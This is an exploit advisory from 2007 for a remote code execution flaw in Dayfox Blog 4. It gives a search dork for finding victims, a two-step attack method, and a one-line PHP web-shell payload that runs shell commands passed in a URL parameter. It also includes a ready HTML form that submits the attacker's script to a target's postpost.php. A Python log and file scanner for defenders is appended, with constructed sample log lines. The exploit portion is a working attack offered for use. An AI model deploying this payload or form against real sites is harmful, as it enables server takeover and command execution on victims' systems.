
# Title : Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability
# Published : 2007-03-14
# Author : Dj7xpl


<html>
<!--
                                                          .-""""""""-.                                 
                                                         /   Dj7xpl                                 
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  o_)( |                                     
                                                        |/     /     |                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) _________|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-IIIIII/-|________________________________>
                                               )_/                  / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Dayfox Blog V 4
#   Download   :   http://www.dayfoxdesigns.co.nr
#   Dork       :   "Powered by Dayfox Designs"
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote Code Execution)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   1- Insert your script into a text file with this exploit     Example: <?php passthru($_GET[cmd]); ?>
#   2- Include the text file through posts.php                    Example: http://localhost/dfblog/posts.php?cmd=ls -la
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

-->
<head><title>--======Dj7xpl======--</title></head>
<body background=http://dj7xpl.by.ru/img/scan.gif> 
<center>
<form action="http://[Target]/[path]/postpost.php" method="post">
            <input type="hidden" name="title" value="Dj7xpl" />
	        <input type="hidden"  name="blog" value="script" /><br><br>
			<font color=#C0FF3E size=+1>your script:</font><br>
            <textarea name="cat"></textarea>
	        <input type="hidden" name="date" value="Hello All" />
	        <input type="hidden" name="catyear" value="dj7xpl" />
       	    <input type="hidden" name="catmonth" value="dj7xpl" />
				<input type="submit" value="write" />
			</form>
			</center>
			</body>
			</html>
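
For defenders, the two steps described in the comment block leave two traces: a PHP open tag inside stored post text, and requests to postpost.php and posts.php in the web server access log. The Python check below is an added example, not part of the original advisory or of Dayfox Blog; the data directory, the `.txt` extension, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs

# Matches <?php, <?= and the short open tag <?, but not an XML declaration.
PHP_OPEN_TAG = re.compile(r"<\?(?!xml)", re.IGNORECASE)
# Request part of a combined-format access log line (assumed log format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def has_php_code(text):
    """True if stored post content contains a PHP open tag."""
    return PHP_OPEN_TAG.search(text) is not None

def scan_post_files(data_dir, pattern="*.txt"):
    """Return post files under data_dir (assumed location and extension) holding PHP."""
    return [p for p in sorted(Path(data_dir).rglob(pattern))
            if has_php_code(p.read_text(errors="replace"))]

def triage_access_log(lines):
    """Return (ip, reason) pairs for requests that match the pattern on this page."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        script = url.path.rsplit("/", 1)[-1].lower()
        if m["method"] == "POST" and script == "postpost.php":
            findings.append((m["ip"], "POST to postpost.php, check stored post for PHP tags"))
        elif script == "posts.php" and "cmd" in parse_qs(url.query, keep_blank_values=True):
            # "cmd" is only the name used in the page's example; the file scan
            # above does not depend on the parameter name.
            findings.append((m["ip"], "posts.php requested with cmd parameter"))
    return findings

# Constructed sample log lines (documentation IP ranges, not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Mar/2007:10:00:01 +0000] "POST /dfblog/postpost.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Mar/2007:10:00:09 +0000] "GET /dfblog/posts.php?cmd=ls%20-la HTTP/1.1" 200 2048',
    '203.0.113.20 - - [14/Mar/2007:10:01:00 +0000] "GET /dfblog/posts.php HTTP/1.1" 200 1900',
]

if __name__ == "__main__":
    for ip, reason in triage_access_log(SAMPLE_LOG):
        print(ip, reason)
```

A POST to postpost.php is also how a legitimate post is written, so that finding is a prompt to inspect the stored file rather than proof of compromise.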

# www.Syue.com [2007-03-14]